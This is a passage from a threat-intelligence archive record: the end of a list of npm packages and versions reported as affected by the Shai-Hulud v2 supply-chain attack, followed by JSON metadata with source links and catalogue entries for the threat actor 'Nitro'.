upload-to-play-store (v1.0.1, v1.0.2)\r\n813. url-encode-decode (v1.0.1, v1.0.2)\r\n814. use-unsaved-changes (v1.0.9)\r\n815. v-plausible (v1.2.1)\r\n816. valid-south-african-id (v1.0.3)\r\n817. valuedex-sdk (v3.0.5)\r\n818. vf-oss-template (v1.0.1, v1.0.2, v1.0.3, v1.0.4)\r\n819. victoria-wallet-constants (v0.1.1, v0.1.2)\r\n820. victoria-wallet-core (v0.1.1, v0.1.2)\r\n821. victoria-wallet-type (v0.1.1, v0.1.2)\r\n822. victoria-wallet-utils (v0.1.1, v0.1.2)\r\n823. victoria-wallet-validator (v0.1.1, v0.1.2)\r\n824. victoriaxoaquyet-wallet-core (v0.2.1, v0.2.2)\r\n825. vite-plugin-httpfile (v0.2.1)\r\n826. vue-browserupdate-nuxt (v1.0.5)\r\n827. wallet-evm (v0.3.1, v0.3.2)\r\n828. wallet-type (v0.1.1, v0.1.2)\r\n829. web-scraper-mcp (v1.1.4)\r\n830. web-types-htmx (v0.1.1)\r\n831. web-types-lit (v0.1.1)\r\n832. webpack-loader-httpfile (v0.2.1)\r\n833. wellness-expert-ng-gallery (v5.1.1)\r\n834. wenk (v1.0.9, v1.0.10)\r\n835. zapier-async-storage (v1.0.1, v1.0.2, v1.0.3)\r\n836. zapier-platform-cli (v18.0.2, v18.0.3, v18.0.4)\r\n837. zapier-platform-core (v18.0.2, v18.0.3, v18.0.4)\r\n838. zapier-platform-legacy-scripting-runner (v4.0.2, v4.0.3, v4.0.4)\r\n839. zapier-platform-schema (v18.0.2, v18.0.3, v18.0.4)\r\n840. zapier-scripts (v7.8.3, v7.8.4)\r\n841. zuper-cli (v1.0.1)\r\n842. zuper-sdk (v1.0.57)\r\n843. zuper-stream (v2.0.9)\r\nSource: https://socket.dev/blog/shai-hulud-strikes-again-v2\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 29 of 29",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://socket.dev/blog/shai-hulud-strikes-again-v2"
	],
	"report_names": [
		"shai-hulud-strikes-again-v2"
	],
	"threat_actors": [
		{
			"id": "9041c438-4bc0-4863-b89c-a32bba33903c",
			"created_at": "2023-01-06T13:46:38.232751Z",
			"updated_at": "2026-04-29T06:58:56.136945Z",
			"deleted_at": null,
			"main_name": "Nitro",
			"aliases": [
				"Covert Grove"
			],
			"source_name": "MISPGALAXY:Nitro",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a2b44a04-a080-4465-973d-976ce53777de",
			"created_at": "2022-10-25T16:07:23.911791Z",
			"updated_at": "2026-04-29T06:58:58.02675Z",
			"deleted_at": null,
			"main_name": "Nitro",
			"aliases": [
				"Covert Grove",
				"Nitro"
			],
			"source_name": "ETDA:Nitro",
			"tools": [
				"AngryRebel",
				"Backdoor.Apocalipto",
				"Chymine",
				"Darkmoon",
				"Farfli",
				"Gen:Trojan.Heur.PT",
				"Gh0st RAT",
				"Ghost RAT",
				"Moudour",
				"Mydoor",
				"PCClient",
				"PCRat",
				"Poison Ivy",
				"SPIVY",
				"Spindest",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1777429236,
	"ts_updated_at": 1777450891,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3e164d2907d9dc36d7e6cce9b24798e4b0b320ea.pdf",
		"text": "https://archive.orkl.eu/3e164d2907d9dc36d7e6cce9b24798e4b0b320ea.txt",
		"img": "https://archive.orkl.eu/3e164d2907d9dc36d7e6cce9b24798e4b0b320ea.jpg"
	}
}